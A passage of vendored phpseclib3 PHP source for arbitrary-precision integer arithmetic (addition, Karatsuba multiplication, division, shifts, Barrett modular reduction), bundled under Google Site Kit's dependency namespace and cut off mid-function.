BigInteger Engine instance * * @param int $base * @see parent::__construct() */ protected function initialize($base) { switch (\abs($base)) { case 16: $x = \strlen($this->value) & 1 ? '0' . $this->value : $this->value; $temp = new static(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::hex2bin($x), 256); $this->value = $temp->value; break; case 10: $temp = new static(); $multiplier = new static(); $multiplier->value = [static::MAX10]; $x = $this->value; if ($x[0] == '-') { $this->is_negative = \true; $x = \substr($x, 1); } $x = \str_pad($x, \strlen($x) + (static::MAX10LEN - 1) * \strlen($x) % static::MAX10LEN, 0, \STR_PAD_LEFT); while (\strlen($x)) { $temp = $temp->multiply($multiplier); $temp = $temp->add(new static($this->int2bytes(\substr($x, 0, static::MAX10LEN)), 256)); $x = \substr($x, static::MAX10LEN); } $this->value = $temp->value; } } /** * Pads strings so that unpack may be used on them * * @param string $str * @return string */ protected function pad($str) { $length = \strlen($str); $pad = 4 - \strlen($str) % 4; return \str_pad($str, $length + $pad, "\x00", \STR_PAD_LEFT); } /** * Converts a BigInteger to a base-10 number. * * @return string */ public function toString() { if (!\count($this->value)) { return '0'; } $temp = clone $this; $temp->bitmask = \false; $temp->is_negative = \false; $divisor = new static(); $divisor->value = [static::MAX10]; $result = ''; while (\count($temp->value)) { list($temp, $mod) = $temp->divide($divisor); $result = \str_pad(isset($mod->value[0]) ? $mod->value[0] : '', static::MAX10LEN, '0', \STR_PAD_LEFT) . $result; } $result = \ltrim($result, '0'); if (empty($result)) { $result = '0'; } if ($this->is_negative) { $result = '-' . $result; } return $result; } /** * Converts a BigInteger to a byte string (eg. base-256). * * @param bool $twos_compliment * @return string */ public function toBytes($twos_compliment = \false) { if ($twos_compliment) { return $this->toBytesHelper(); } if (!\count($this->value)) { return $this->precision > 0 ? \str_repeat(\chr(0), $this->precision + 1 >> 3) : ''; } $result = $this->bitwise_small_split(8); $result = \implode('', \array_map('chr', $result)); return $this->precision > 0 ? \str_pad(\substr($result, -($this->precision + 7 >> 3)), $this->precision + 7 >> 3, \chr(0), \STR_PAD_LEFT) : $result; } /** * Performs addition. * * @param array $x_value * @param bool $x_negative * @param array $y_value * @param bool $y_negative * @return array */ protected static function addHelper(array $x_value, $x_negative, array $y_value, $y_negative) { $x_size = \count($x_value); $y_size = \count($y_value); if ($x_size == 0) { return [self::VALUE => $y_value, self::SIGN => $y_negative]; } elseif ($y_size == 0) { return [self::VALUE => $x_value, self::SIGN => $x_negative]; } // subtract, if appropriate if ($x_negative != $y_negative) { if ($x_value == $y_value) { return [self::VALUE => [], self::SIGN => \false]; } $temp = self::subtractHelper($x_value, \false, $y_value, \false); $temp[self::SIGN] = self::compareHelper($x_value, \false, $y_value, \false) > 0 ? $x_negative : $y_negative; return $temp; } if ($x_size < $y_size) { $size = $x_size; $value = $y_value; } else { $size = $y_size; $value = $x_value; } $value[\count($value)] = 0; // just in case the carry adds an extra digit $carry = 0; for ($i = 0, $j = 1; $j < $size; $i += 2, $j += 2) { //$sum = $x_value[$j] * static::BASE_FULL + $x_value[$i] + $y_value[$j] * static::BASE_FULL + $y_value[$i] + $carry; $sum = ($x_value[$j] + $y_value[$j]) * static::BASE_FULL + $x_value[$i] + $y_value[$i] + $carry; $carry = $sum >= static::MAX_DIGIT2; // eg. floor($sum / 2**52); only possible values (in any base) are 0 and 1 $sum = $carry ? $sum - static::MAX_DIGIT2 : $sum; $temp = static::BASE === 26 ? \intval($sum / 0x4000000) : $sum >> 31; $value[$i] = (int) ($sum - static::BASE_FULL * $temp); // eg. a faster alternative to fmod($sum, 0x4000000) $value[$j] = $temp; } if ($j == $size) { // ie. if $y_size is odd $sum = $x_value[$i] + $y_value[$i] + $carry; $carry = $sum >= static::BASE_FULL; $value[$i] = $carry ? $sum - static::BASE_FULL : $sum; ++$i; // ie. let $i = $j since we've just done $value[$i] } if ($carry) { for (; $value[$i] == static::MAX_DIGIT; ++$i) { $value[$i] = 0; } ++$value[$i]; } return [self::VALUE => self::trim($value), self::SIGN => $x_negative]; } /** * Performs subtraction. * * @param array $x_value * @param bool $x_negative * @param array $y_value * @param bool $y_negative * @return array */ public static function subtractHelper(array $x_value, $x_negative, array $y_value, $y_negative) { $x_size = \count($x_value); $y_size = \count($y_value); if ($x_size == 0) { return [self::VALUE => $y_value, self::SIGN => !$y_negative]; } elseif ($y_size == 0) { return [self::VALUE => $x_value, self::SIGN => $x_negative]; } // add, if appropriate (ie. -$x - +$y or +$x - -$y) if ($x_negative != $y_negative) { $temp = self::addHelper($x_value, \false, $y_value, \false); $temp[self::SIGN] = $x_negative; return $temp; } $diff = self::compareHelper($x_value, $x_negative, $y_value, $y_negative); if (!$diff) { return [self::VALUE => [], self::SIGN => \false]; } // switch $x and $y around, if appropriate. if (!$x_negative && $diff < 0 || $x_negative && $diff > 0) { $temp = $x_value; $x_value = $y_value; $y_value = $temp; $x_negative = !$x_negative; $x_size = \count($x_value); $y_size = \count($y_value); } // at this point, $x_value should be at least as big as - if not bigger than - $y_value $carry = 0; for ($i = 0, $j = 1; $j < $y_size; $i += 2, $j += 2) { $sum = ($x_value[$j] - $y_value[$j]) * static::BASE_FULL + $x_value[$i] - $y_value[$i] - $carry; $carry = $sum < 0; // eg. floor($sum / 2**52); only possible values (in any base) are 0 and 1 $sum = $carry ? $sum + static::MAX_DIGIT2 : $sum; $temp = static::BASE === 26 ? \intval($sum / 0x4000000) : $sum >> 31; $x_value[$i] = (int) ($sum - static::BASE_FULL * $temp); $x_value[$j] = $temp; } if ($j == $y_size) { // ie. if $y_size is odd $sum = $x_value[$i] - $y_value[$i] - $carry; $carry = $sum < 0; $x_value[$i] = $carry ? $sum + static::BASE_FULL : $sum; ++$i; } if ($carry) { for (; !$x_value[$i]; ++$i) { $x_value[$i] = static::MAX_DIGIT; } --$x_value[$i]; } return [self::VALUE => self::trim($x_value), self::SIGN => $x_negative]; } /** * Performs multiplication. * * @param array $x_value * @param bool $x_negative * @param array $y_value * @param bool $y_negative * @return array */ protected static function multiplyHelper(array $x_value, $x_negative, array $y_value, $y_negative) { //if ( $x_value == $y_value ) { // return [ // self::VALUE => self::square($x_value), // self::SIGN => $x_sign != $y_value // ]; //} $x_length = \count($x_value); $y_length = \count($y_value); if (!$x_length || !$y_length) { // a 0 is being multiplied return [self::VALUE => [], self::SIGN => \false]; } return [self::VALUE => \min($x_length, $y_length) < 2 * self::KARATSUBA_CUTOFF ? self::trim(self::regularMultiply($x_value, $y_value)) : self::trim(self::karatsuba($x_value, $y_value)), self::SIGN => $x_negative != $y_negative]; } /** * Performs Karatsuba multiplication on two BigIntegers * * See {@link http://en.wikipedia.org/wiki/Karatsuba_algorithm Karatsuba algorithm} and * {@link http://math.libtomcrypt.com/files/tommath.pdf#page=120 MPM 5.2.3}. * * @param array $x_value * @param array $y_value * @return array */ private static function karatsuba(array $x_value, array $y_value) { $m = \min(\count($x_value) >> 1, \count($y_value) >> 1); if ($m < self::KARATSUBA_CUTOFF) { return self::regularMultiply($x_value, $y_value); } $x1 = \array_slice($x_value, $m); $x0 = \array_slice($x_value, 0, $m); $y1 = \array_slice($y_value, $m); $y0 = \array_slice($y_value, 0, $m); $z2 = self::karatsuba($x1, $y1); $z0 = self::karatsuba($x0, $y0); $z1 = self::addHelper($x1, \false, $x0, \false); $temp = self::addHelper($y1, \false, $y0, \false); $z1 = self::karatsuba($z1[self::VALUE], $temp[self::VALUE]); $temp = self::addHelper($z2, \false, $z0, \false); $z1 = self::subtractHelper($z1, \false, $temp[self::VALUE], \false); $z2 = \array_merge(\array_fill(0, 2 * $m, 0), $z2); $z1[self::VALUE] = \array_merge(\array_fill(0, $m, 0), $z1[self::VALUE]); $xy = self::addHelper($z2, \false, $z1[self::VALUE], $z1[self::SIGN]); $xy = self::addHelper($xy[self::VALUE], $xy[self::SIGN], $z0, \false); return $xy[self::VALUE]; } /** * Performs long multiplication on two BigIntegers * * Modeled after 'multiply' in MutableBigInteger.java. * * @param array $x_value * @param array $y_value * @return array */ protected static function regularMultiply(array $x_value, array $y_value) { $x_length = \count($x_value); $y_length = \count($y_value); if (!$x_length || !$y_length) { // a 0 is being multiplied return []; } $product_value = self::array_repeat(0, $x_length + $y_length); // the following for loop could be removed if the for loop following it // (the one with nested for loops) initially set $i to 0, but // doing so would also make the result in one set of unnecessary adds, // since on the outermost loops first pass, $product->value[$k] is going // to always be 0 $carry = 0; for ($j = 0; $j < $x_length; ++$j) { // ie. $i = 0 $temp = $x_value[$j] * $y_value[0] + $carry; // $product_value[$k] == 0 $carry = static::BASE === 26 ? \intval($temp / 0x4000000) : $temp >> 31; $product_value[$j] = (int) ($temp - static::BASE_FULL * $carry); } $product_value[$j] = $carry; // the above for loop is what the previous comment was talking about. the // following for loop is the "one with nested for loops" for ($i = 1; $i < $y_length; ++$i) { $carry = 0; for ($j = 0, $k = $i; $j < $x_length; ++$j, ++$k) { $temp = $product_value[$k] + $x_value[$j] * $y_value[$i] + $carry; $carry = static::BASE === 26 ? \intval($temp / 0x4000000) : $temp >> 31; $product_value[$k] = (int) ($temp - static::BASE_FULL * $carry); } $product_value[$k] = $carry; } return $product_value; } /** * Divides two BigIntegers. * * Returns an array whose first element contains the quotient and whose second element contains the * "common residue". If the remainder would be positive, the "common residue" and the remainder are the * same. If the remainder would be negative, the "common residue" is equal to the sum of the remainder * and the divisor (basically, the "common residue" is the first positive modulo). * * @return array{static, static} * @internal This function is based off of * {@link http://www.cacr.math.uwaterloo.ca/hac/about/chap14.pdf#page=9 HAC 14.20}. */ protected function divideHelper(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP $y) { if (\count($y->value) == 1) { list($q, $r) = $this->divide_digit($this->value, $y->value[0]); $quotient = new static(); $remainder = new static(); $quotient->value = $q; $remainder->value = [$r]; $quotient->is_negative = $this->is_negative != $y->is_negative; return [$this->normalize($quotient), $this->normalize($remainder)]; } $x = clone $this; $y = clone $y; $x_sign = $x->is_negative; $y_sign = $y->is_negative; $x->is_negative = $y->is_negative = \false; $diff = $x->compare($y); if (!$diff) { $temp = new static(); $temp->value = [1]; $temp->is_negative = $x_sign != $y_sign; return [$this->normalize($temp), $this->normalize(static::$zero[static::class])]; } if ($diff < 0) { // if $x is negative, "add" $y. if ($x_sign) { $x = $y->subtract($x); } return [$this->normalize(static::$zero[static::class]), $this->normalize($x)]; } // normalize $x and $y as described in HAC 14.23 / 14.24 $msb = $y->value[\count($y->value) - 1]; for ($shift = 0; !($msb & static::MSB); ++$shift) { $msb <<= 1; } $x->lshift($shift); $y->lshift($shift); $y_value =& $y->value; $x_max = \count($x->value) - 1; $y_max = \count($y->value) - 1; $quotient = new static(); $quotient_value =& $quotient->value; $quotient_value = self::array_repeat(0, $x_max - $y_max + 1); static $temp, $lhs, $rhs; if (!isset($temp)) { $temp = new static(); $lhs = new static(); $rhs = new static(); } if (static::class != \get_class($temp)) { $temp = new static(); $lhs = new static(); $rhs = new static(); } $temp_value =& $temp->value; $rhs_value =& $rhs->value; // $temp = $y << ($x_max - $y_max-1) in base 2**26 $temp_value = \array_merge(self::array_repeat(0, $x_max - $y_max), $y_value); while ($x->compare($temp) >= 0) { // calculate the "common residue" ++$quotient_value[$x_max - $y_max]; $x = $x->subtract($temp); $x_max = \count($x->value) - 1; } for ($i = $x_max; $i >= $y_max + 1; --$i) { $x_value =& $x->value; $x_window = [isset($x_value[$i]) ? $x_value[$i] : 0, isset($x_value[$i - 1]) ? $x_value[$i - 1] : 0, isset($x_value[$i - 2]) ? $x_value[$i - 2] : 0]; $y_window = [$y_value[$y_max], $y_max > 0 ? $y_value[$y_max - 1] : 0]; $q_index = $i - $y_max - 1; if ($x_window[0] == $y_window[0]) { $quotient_value[$q_index] = static::MAX_DIGIT; } else { $quotient_value[$q_index] = self::safe_divide($x_window[0] * static::BASE_FULL + $x_window[1], $y_window[0]); } $temp_value = [$y_window[1], $y_window[0]]; $lhs->value = [$quotient_value[$q_index]]; $lhs = $lhs->multiply($temp); $rhs_value = [$x_window[2], $x_window[1], $x_window[0]]; while ($lhs->compare($rhs) > 0) { --$quotient_value[$q_index]; $lhs->value = [$quotient_value[$q_index]]; $lhs = $lhs->multiply($temp); } $adjust = self::array_repeat(0, $q_index); $temp_value = [$quotient_value[$q_index]]; $temp = $temp->multiply($y); $temp_value =& $temp->value; if (\count($temp_value)) { $temp_value = \array_merge($adjust, $temp_value); } $x = $x->subtract($temp); if ($x->compare(static::$zero[static::class]) < 0) { $temp_value = \array_merge($adjust, $y_value); $x = $x->add($temp); --$quotient_value[$q_index]; } $x_max = \count($x_value) - 1; } // unnormalize the remainder $x->rshift($shift); $quotient->is_negative = $x_sign != $y_sign; // calculate the "common residue", if appropriate if ($x_sign) { $y->rshift($shift); $x = $y->subtract($x); } return [$this->normalize($quotient), $this->normalize($x)]; } /** * Divides a BigInteger by a regular integer * * abc / x = a00 / x + b0 / x + c / x * * @param array $dividend * @param int $divisor * @return array */ private static function divide_digit(array $dividend, $divisor) { $carry = 0; $result = []; for ($i = \count($dividend) - 1; $i >= 0; --$i) { $temp = static::BASE_FULL * $carry + $dividend[$i]; $result[$i] = self::safe_divide($temp, $divisor); $carry = (int) ($temp - $divisor * $result[$i]); } return [$result, $carry]; } /** * Single digit division * * Even if int64 is being used the division operator will return a float64 value * if the dividend is not evenly divisible by the divisor. Since a float64 doesn't * have the precision of int64 this is a problem so, when int64 is being used, * we'll guarantee that the dividend is divisible by first subtracting the remainder. * * @param int $x * @param int $y * @return int */ private static function safe_divide($x, $y) { if (static::BASE === 26) { return (int) ($x / $y); } // static::BASE === 31 /** @var int */ return ($x - $x % $y) / $y; } /** * Convert an array / boolean to a PHP BigInteger object * * @param array $arr * @return static */ protected function convertToObj(array $arr) { $result = new static(); $result->value = $arr[self::VALUE]; $result->is_negative = $arr[self::SIGN]; return $this->normalize($result); } /** * Normalize * * Removes leading zeros and truncates (if necessary) to maintain the appropriate precision * * @param PHP $result * @return static */ protected function normalize(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP $result) { $result->precision = $this->precision; $result->bitmask = $this->bitmask; $value =& $result->value; if (!\count($value)) { $result->is_negative = \false; return $result; } $value = static::trim($value); if (!empty($result->bitmask->value)) { $length = \min(\count($value), \count($result->bitmask->value)); $value = \array_slice($value, 0, $length); for ($i = 0; $i < $length; ++$i) { $value[$i] = $value[$i] & $result->bitmask->value[$i]; } $value = static::trim($value); } return $result; } /** * Compares two numbers. * * @param array $x_value * @param bool $x_negative * @param array $y_value * @param bool $y_negative * @return int * @see static::compare() */ protected static function compareHelper(array $x_value, $x_negative, array $y_value, $y_negative) { if ($x_negative != $y_negative) { return !$x_negative && $y_negative ? 1 : -1; } $result = $x_negative ? -1 : 1; if (\count($x_value) != \count($y_value)) { return \count($x_value) > \count($y_value) ? $result : -$result; } $size = \max(\count($x_value), \count($y_value)); $x_value = \array_pad($x_value, $size, 0); $y_value = \array_pad($y_value, $size, 0); for ($i = \count($x_value) - 1; $i >= 0; --$i) { if ($x_value[$i] != $y_value[$i]) { return $x_value[$i] > $y_value[$i] ? $result : -$result; } } return 0; } /** * Absolute value. * * @return PHP */ public function abs() { $temp = new static(); $temp->value = $this->value; return $temp; } /** * Trim * * Removes leading zeros * * @param list<static> $value * @return list<static> */ protected static function trim(array $value) { for ($i = \count($value) - 1; $i >= 0; --$i) { if ($value[$i]) { break; } unset($value[$i]); } return $value; } /** * Logical Right Shift * * Shifts BigInteger's by $shift bits, effectively dividing by 2**$shift. * * @param int $shift * @return PHP */ public function bitwise_rightShift($shift) { $temp = new static(); // could just replace lshift with this, but then all lshift() calls would need to be rewritten // and I don't want to do that... $temp->value = $this->value; $temp->rshift($shift); return $this->normalize($temp); } /** * Logical Left Shift * * Shifts BigInteger's by $shift bits, effectively multiplying by 2**$shift. * * @param int $shift * @return PHP */ public function bitwise_leftShift($shift) { $temp = new static(); // could just replace _rshift with this, but then all _lshift() calls would need to be rewritten // and I don't want to do that... $temp->value = $this->value; $temp->lshift($shift); return $this->normalize($temp); } /** * Converts 32-bit integers to bytes. * * @param int $x * @return string */ private static function int2bytes($x) { return \ltrim(\pack('N', $x), \chr(0)); } /** * Array Repeat * * @param int $input * @param int $multiplier * @return array */ protected static function array_repeat($input, $multiplier) { return $multiplier ? \array_fill(0, $multiplier, $input) : []; } /** * Logical Left Shift * * Shifts BigInteger's by $shift bits. * * @param int $shift */ protected function lshift($shift) { if ($shift == 0) { return; } $num_digits = (int) ($shift / static::BASE); $shift %= static::BASE; $shift = 1 << $shift; $carry = 0; for ($i = 0; $i < \count($this->value); ++$i) { $temp = $this->value[$i] * $shift + $carry; $carry = static::BASE === 26 ? \intval($temp / 0x4000000) : $temp >> 31; $this->value[$i] = (int) ($temp - $carry * static::BASE_FULL); } if ($carry) { $this->value[\count($this->value)] = $carry; } while ($num_digits--) { \array_unshift($this->value, 0); } } /** * Logical Right Shift * * Shifts BigInteger's by $shift bits. * * @param int $shift */ protected function rshift($shift) { if ($shift == 0) { return; } $num_digits = (int) ($shift / static::BASE); $shift %= static::BASE; $carry_shift = static::BASE - $shift; $carry_mask = (1 << $shift) - 1; if ($num_digits) { $this->value = \array_slice($this->value, $num_digits); } $carry = 0; for ($i = \count($this->value) - 1; $i >= 0; --$i) { $temp = $this->value[$i] >> $shift | $carry; $carry = ($this->value[$i] & $carry_mask) << $carry_shift; $this->value[$i] = $temp; } $this->value = static::trim($this->value); } /** * Performs modular exponentiation. * * @param PHP $e * @param PHP $n * @return PHP */ protected function powModInner(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP $n) { try { $class = static::$modexpEngine[static::class]; return $class::powModHelper($this, $e, $n, static::class); } catch (\Exception $err) { return \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP\DefaultEngine::powModHelper($this, $e, $n, static::class); } } /** * Performs squaring * * @param list<static> $x * @return list<static> */ protected static function square(array $x) { return \count($x) < 2 * self::KARATSUBA_CUTOFF ? self::trim(self::baseSquare($x)) : self::trim(self::karatsubaSquare($x)); } /** * Performs traditional squaring on two BigIntegers * * Squaring can be done faster than multiplying a number by itself can be. See * {@link http://www.cacr.math.uwaterloo.ca/hac/about/chap14.pdf#page=7 HAC 14.2.4} / * {@link http://math.libtomcrypt.com/files/tommath.pdf#page=141 MPM 5.3} for more information. * * @param array $value * @return array */ protected static function baseSquare(array $value) { if (empty($value)) { return []; } $square_value = self::array_repeat(0, 2 * \count($value)); for ($i = 0, $max_index = \count($value) - 1; $i <= $max_index; ++$i) { $i2 = $i << 1; $temp = $square_value[$i2] + $value[$i] * $value[$i]; $carry = static::BASE === 26 ? \intval($temp / 0x4000000) : $temp >> 31; $square_value[$i2] = (int) ($temp - static::BASE_FULL * $carry); // note how we start from $i+1 instead of 0 as we do in multiplication. for ($j = $i + 1, $k = $i2 + 1; $j <= $max_index; ++$j, ++$k) { $temp = $square_value[$k] + 2 * $value[$j] * $value[$i] + $carry; $carry = static::BASE === 26 ? \intval($temp / 0x4000000) : $temp >> 31; $square_value[$k] = (int) ($temp - static::BASE_FULL * $carry); } // the following line can yield values larger 2**15. at this point, PHP should switch // over to floats. $square_value[$i + $max_index + 1] = $carry; } return $square_value; } /** * Performs Karatsuba "squaring" on two BigIntegers * * See {@link http://en.wikipedia.org/wiki/Karatsuba_algorithm Karatsuba algorithm} and * {@link http://math.libtomcrypt.com/files/tommath.pdf#page=151 MPM 5.3.4}. * * @param array $value * @return array */ protected static function karatsubaSquare(array $value) { $m = \count($value) >> 1; if ($m < self::KARATSUBA_CUTOFF) { return self::baseSquare($value); } $x1 = \array_slice($value, $m); $x0 = \array_slice($value, 0, $m); $z2 = self::karatsubaSquare($x1); $z0 = self::karatsubaSquare($x0); $z1 = self::addHelper($x1, \false, $x0, \false); $z1 = self::karatsubaSquare($z1[self::VALUE]); $temp = self::addHelper($z2, \false, $z0, \false); $z1 = self::subtractHelper($z1, \false, $temp[self::VALUE], \false); $z2 = \array_merge(\array_fill(0, 2 * $m, 0), $z2); $z1[self::VALUE] = \array_merge(\array_fill(0, $m, 0), $z1[self::VALUE]); $xx = self::addHelper($z2, \false, $z1[self::VALUE], $z1[self::SIGN]); $xx = self::addHelper($xx[self::VALUE], $xx[self::SIGN], $z0, \false); return $xx[self::VALUE]; } /** * Make the current number odd * * If the current number is odd it'll be unchanged. If it's even, one will be added to it. * * @see self::randomPrime() */ protected function make_odd() { $this->value[0] |= 1; } /** * Test the number against small primes. * * @see self::isPrime() */ protected function testSmallPrimes() { if ($this->value == [1]) { return \false; } if ($this->value == [2]) { return \true; } if (~$this->value[0] & 1) { return \false; } $value = $this->value; foreach (static::PRIMES as $prime) { list(, $r) = self::divide_digit($value, $prime); if (!$r) { return \count($value) == 1 && $value[0] == $prime; } } return \true; } /** * Scan for 1 and right shift by that amount * * ie. $s = gmp_scan1($n, 0) and $r = gmp_div_q($n, gmp_pow(gmp_init('2'), $s)); * * @param PHP $r * @return int * @see self::isPrime() */ public static function scan1divide(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP $r) { $r_value =& $r->value; for ($i = 0, $r_length = \count($r_value); $i < $r_length; ++$i) { $temp = ~$r_value[$i] & static::MAX_DIGIT; for ($j = 1; $temp >> $j & 1; ++$j) { } if ($j <= static::BASE) { break; } } $s = static::BASE * $i + $j; $r->rshift($s); return $s; } /** * Performs exponentiation. * * @param PHP $n * @return PHP */ protected function powHelper(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP $n) { if ($n->compare(static::$zero[static::class]) == 0) { return new static(1); } // n^0 = 1 $temp = clone $this; while (!$n->equals(static::$one[static::class])) { $temp = $temp->multiply($this); $n = $n->subtract(static::$one[static::class]); } return $temp; } /** * Is Odd? * * @return bool */ public function isOdd() { return (bool) ($this->value[0] & 1); } /** * Tests if a bit is set * * @return bool */ public function testBit($x) { $digit = (int) \floor($x / static::BASE); $bit = $x % static::BASE; if (!isset($this->value[$digit])) { return \false; } return (bool) ($this->value[$digit] & 1 << $bit); } /** * Is Negative? * * @return bool */ public function isNegative() { return $this->is_negative; } /** * Negate * * Given $k, returns -$k * * @return static */ public function negate() { $temp = clone $this; $temp->is_negative = !$temp->is_negative; return $temp; } /** * Bitwise Split * * Splits BigInteger's into chunks of $split bits * * @param int $split * @return list<static> */ public function bitwise_split($split) { if ($split < 1) { throw new \RuntimeException('Offset must be greater than 1'); } $width = (int) ($split / static::BASE); if (!$width) { $arr = $this->bitwise_small_split($split); return \array_map(function ($digit) { $temp = new static(); $temp->value = $digit != 0 ? [$digit] : []; return $temp; }, $arr); } $vals = []; $val = $this->value; $i = $overflow = 0; $len = \count($val); while ($i < $len) { $digit = []; if (!$overflow) { $digit = \array_slice($val, $i, $width); $i += $width; $overflow = $split % static::BASE; if ($overflow) { $mask = (1 << $overflow) - 1; $temp = isset($val[$i]) ? $val[$i] : 0; $digit[] = $temp & $mask; } } else { $remaining = static::BASE - $overflow; $tempsplit = $split - $remaining; $tempwidth = (int) ($tempsplit / static::BASE + 1); $digit = \array_slice($val, $i, $tempwidth); $i += $tempwidth; $tempoverflow = $tempsplit % static::BASE; if ($tempoverflow) { $tempmask = (1 << $tempoverflow) - 1; $temp = isset($val[$i]) ? $val[$i] : 0; $digit[] = $temp & $tempmask; } $newbits = 0; for ($j = \count($digit) - 1; $j >= 0; $j--) { $temp = $digit[$j] & $mask; $digit[$j] = $digit[$j] >> $overflow | $newbits << $remaining; $newbits = $temp; } $overflow = $tempoverflow; $mask = $tempmask; } $temp = new static(); $temp->value = static::trim($digit); $vals[] = $temp; } return \array_reverse($vals); } /** * Bitwise Split where $split < static::BASE * * @param int $split * @return list<int> */ private function bitwise_small_split($split) { $vals = []; $val = $this->value; $mask = (1 << $split) - 1; $i = $overflow = 0; $len = \count($val); $val[] = 0; $remaining = static::BASE; while ($i != $len) { $digit = $val[$i] & $mask; $val[$i] >>= $split; if (!$overflow) { $remaining -= $split; $overflow = $split <= $remaining ? 0 : $split - $remaining; if (!$remaining) { $i++; $remaining = static::BASE; $overflow = 0; } } elseif (++$i != $len) { $tempmask = (1 << $overflow) - 1; $digit |= ($val[$i] & $tempmask) << $remaining; $val[$i] >>= $overflow; $remaining = static::BASE - $overflow; $overflow = $split <= $remaining ? 0 : $split - $remaining; } $vals[] = $digit; } while ($vals[\count($vals) - 1] == 0) { unset($vals[\count($vals) - 1]); } return \array_reverse($vals); } /** * @return bool */ protected static function testJITOnWindows() { // see https://github.com/php/php-src/issues/11917 if (\strtoupper(\substr(\PHP_OS, 0, 3)) === 'WIN' && \function_exists('opcache_get_status') && \PHP_VERSION_ID < 80213 && !\defined('Google\\Site_Kit_Dependencies\\PHPSECLIB_ALLOW_JIT')) { $status = \opcache_get_status(); if ($status && isset($status['jit']) && $status['jit']['enabled'] && $status['jit']['on']) { return \true; } } return \false; } /** * Return the size of a BigInteger in bits * * @return int */ public function getLength() { $max = \count($this->value) - 1; return $max != -1 ? $max * static::BASE + \intval(\ceil(\log($this->value[$max] + 1, 2))) : 0; } } <?php /** * Modular Exponentiation Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath; /** * Sliding Window Exponentiation Engine * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Base extends \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath { /** * Cache constants * * $cache[self::VARIABLE] tells us whether or not the cached data is still valid. * */ const VARIABLE = 0; /** * $cache[self::DATA] contains the cached data. * */ const DATA = 1; /** * Test for engine validity * * @return bool */ public static function isValidEngine() { return static::class != __CLASS__; } /** * Performs modular exponentiation. * * @param BCMath $x * @param BCMath $e * @param BCMath $n * @param string $class * @return BCMath */ protected static function powModHelper(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $x, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $n, $class) { if (empty($e->value)) { $temp = new $class(); $temp->value = '1'; return $x->normalize($temp); } return $x->normalize(static::slidingWindow($x, $e, $n, $class)); } /** * Modular reduction preparation * * @param string $x * @param string $n * @param string $class * @see self::slidingWindow() * @return string */ protected static function prepareReduce($x, $n, $class) { return static::reduce($x, $n); } /** * Modular multiply * * @param string $x * @param string $y * @param string $n * @param string $class * @see self::slidingWindow() * @return string */ protected static function multiplyReduce($x, $y, $n, $class) { return static::reduce(\bcmul($x, $y), $n); } /** * Modular square * * @param string $x * @param string $n * @param string $class * @see self::slidingWindow() * @return string */ protected static function squareReduce($x, $n, $class) { return static::reduce(\bcmul($x, $x), $n); } } <?php /** * BCMath Default Modular Exponentiation Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath\Reductions\Barrett; /** * PHP Default Modular Exponentiation Engine * * @author Jim Wigginton <terrafrost@php.net> */ abstract class DefaultEngine extends \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath\Reductions\Barrett { } <?php /** * BCMath Dynamic Barrett Modular Exponentiation Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath\Reductions; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath\Base; /** * PHP Barrett Modular Exponentiation Engine * * @author Jim Wigginton <terrafrost@php.net> */ abstract class EvalBarrett extends \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath\Base { /** * Custom Reduction Function * * @see self::generateCustomReduction */ private static $custom_reduction; /** * Barrett Modular Reduction * * This calls a dynamically generated loop unrolled function that's specific to a given modulo. * Array lookups are avoided as are if statements testing for how many bits the host OS supports, etc. * * @param string $n * @param string $m * @return string */ protected static function reduce($n, $m) { $inline = self::$custom_reduction; return $inline($n); } /** * Generate Custom Reduction * * @param BCMath $m * @param string $class * @return callable|void */ protected static function generateCustomReduction(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $m, $class) { $m_length = \strlen($m); if ($m_length < 5) { $code = 'return bcmod($x, $n);'; eval('$func = function ($n) { ' . $code . '};'); self::$custom_reduction = $func; return; } $lhs = '1' . \str_repeat('0', $m_length + ($m_length >> 1)); $u = \bcdiv($lhs, $m, 0); $m1 = \bcsub($lhs, \bcmul($u, $m)); $cutoff = $m_length + ($m_length >> 1); $m = "'{$m}'"; $u = "'{$u}'"; $m1 = "'{$m1}'"; $code = ' $lsd = substr($n, -' . $cutoff . '); $msd = substr($n, 0, -' . $cutoff . '); $temp = bcmul($msd, ' . $m1 . '); $n = bcadd($lsd, $temp); $temp = substr($n, 0, ' . (-$m_length + 1) . '); $temp = bcmul($temp, ' . $u . '); $temp = 